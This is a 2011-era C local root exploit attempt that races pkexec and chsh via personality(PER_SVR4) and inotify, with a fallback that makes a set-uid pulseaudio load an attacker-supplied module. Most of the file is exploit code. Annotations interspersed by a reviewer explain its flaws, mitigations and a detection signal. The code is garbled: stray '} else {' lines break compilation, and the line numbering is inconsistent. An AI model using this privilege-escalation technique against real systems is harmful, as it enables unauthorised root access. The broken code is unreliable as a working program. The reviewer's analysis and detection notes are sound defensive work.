  1. /* pwnkernel.c 2011 */
  2. #include <stdio.h>
  3. #include <stdlib.h>
  4. #include <unistd.h>
  5. #include <fcntl.h>
  6. #include <sys/personality.h>
  7. #include <sys/stat.h>
  8. #include <sys/types.h>
  9. #include <sys/inotify.h>
  10.  
  11. #define PU_PATH "/usr/bin/pulseaudio"
  12. #define PK_PATH "/usr/bin/pkexec"
  13.  
  14. #define PATH_TO_EXPLOIT "/home/teste/exploit.so"
  15.  
/*
 * main: a 2011-era local privilege-escalation attempt.  It switches the
 * process to the legacy PER_SVR4 execution personality, checks that the
 * pulseaudio and pkexec binaries exist, registers an inotify watch on
 * /proc/<pid>, then exec's chsh, pkexec and -- as a "failsafe" --
 * pulseaudio with a caller-supplied module path (PATH_TO_EXPLOIT).
 *
 * Review notes (reading only what is on the page):
 *  - As pasted this is not valid C.  The two `} else {` lines below close
 *    main()'s opening brace and then introduce `else` without an `if`, so
 *    the unit does not compile.  Treat it as a fragment, not a tool.
 *  - Every failure path returns 0, so exit status cannot distinguish
 *    success from failure.
 *  - After close(2) every fprintf(stderr, ...) writes to a closed stream
 *    and is discarded; none of the later status messages can appear.
 *  - execl() replaces the process when it succeeds, so each "Success"
 *    message and each subsequent execl() is reached only when the
 *    preceding exec FAILED.
 *  - Mitigation / detection: modern kernels clear the security-relevant
 *    personality flags on set-uid exec (PER_CLEAR_ON_SETID) and
 *    vm.mmap_min_addr independently blocks low mappings; pulseaudio is
 *    normally not installed set-uid.  An unprivileged process calling
 *    personality(PER_SVR4) and then exec'ing set-uid binaries is an
 *    unusual sequence that is worth alerting on.
 *
 * argc/argv are unused; argv is declared `int **` rather than the
 * standard `char **`.  Returns 0 on every path it actually reaches.
 */
int main(int argc, int **argv) {
        int ret,fd;
        char pid_path[1024];
        /* the variable name shadows fstat(2), declared in <sys/stat.h> */
        struct stat fstat;
        /* legacy System V personality; exec'd children inherit it unless
         * the kernel strips the flags on set-uid exec (see header note) */
        ret = personality(PER_SVR4);
        if (ret == -1) {
        fprintf(stderr, "[-] Unable to set personality!\n");
        return 0;   /* failure reported as exit status 0 */
        }
        fprintf(stdout, " [+] Personality set to: PER_SVR4 ..\n");
        /* existence check only; st_mode is not inspected here and fstat is
         * overwritten by the next stat() call below */
        if (stat(PU_PATH, &fstat)) {
       fprintf(stderr, "[-] PulseAudio doesnt exist!\n");
        return 0;
        }
        /* copy-paste: repeats the personality message after the pulseaudio
         * check; it says nothing about PU_PATH */
        fprintf(stdout, " [+] Personality set to: PER_SVR4 ..\n");
        /* this second stat() is what the S_ISUID check further down sees */
        if (stat(PK_PATH, &fstat)) {
       fprintf(stderr, "[-] PolicyKit (2010) doesnt exist!\n");
        return 0;
        }
        fprintf(stderr, "[+] Gettin our PID for policykit exploiting ..\n");
        /* unbounded sprintf; "/proc/" plus a pid fits in 1024 bytes, so no
         * overflow here, but the buffer size is not enforced by the call */
        sprintf(pid_path, "/proc/%i", getpid()); // could maybe do like /proc/self/exe ,or other trix ;>
        /* closing 0-2 makes every later fprintf(stderr) fail silently; the
         * next descriptor opened (the inotify fd) will be 0 */
        close(0);
        close(1);
        close(2);
        fd = inotify_init();
        /* return value unchecked: a failed watch goes unnoticed */
        inotify_add_watch(fd, pid_path, IN_ACCESS);
        fprintf(stderr, "[+] Inotify watching ..\n");
        /* zero-length read into NULL: no event can be delivered and the
         * result is ignored; whether it blocks at all is kernel-dependent,
         * so this is not a reliable synchronisation point */
        read(fd, NULL, 0);
        fprintf(stderr, "[!] Lets try exploit this race! chsh() first ..\n");
        /* on success execl() never returns; the lines below run only if
         * the exec failed */
        execl("/usr/bin/chsh", "chsh", NULL);
        fprintf(stderr, "[+] Success! Now the MAIN pxexec() binary ..\n");
        /* same: reached only after a failed chsh exec */
        execl(PK_PATH, "pkexec", "/bin/sh", NULL);
        fprintf(stderr, "[*] Got root using pkexec() local!\n");
        /* SYNTAX ERROR: this '}' closes main(); 'else' has no matching 'if' */
        } else {
        sleep(2);
        }
        /* fstat holds the PK_PATH result here, so this checks pkexec's
         * mode/owner only, never pulseaudio's, contrary to the message */
        if (!(fstat.st_mode & S_ISUID) || fstat.st_uid != 0) {
       fprintf(stderr, "[-] Pulseaudio/PolicyKit-2010 is not suid root!\n");
        return 0;
        }
        fprintf(stderr, "[=] Failsafer running,try revive this exploit ..\n");
        /* "failsafe": relies on a set-uid pulseaudio honouring -L with a
         * caller-controlled module path; distributions do not normally
         * ship pulseaudio set-uid */
        execl(PU_PATH, PU_PATH, "--log-level=0", "-L", PATH_TO_EXPLOIT, NULL);
        /* SYNTAX ERROR: second stray 'else' (see above) */
        } else {
        /* reached only if the pulseaudio exec failed */
        execl(PK_PATH, "pkexec", "/bin/su", "-c", "/bin/sh", PATH_TO_EXPLOIT, NULL);
        fprintf(stderr, "[*] Success ..\n");
        }
        return 0;
}
  64. // E0F 2011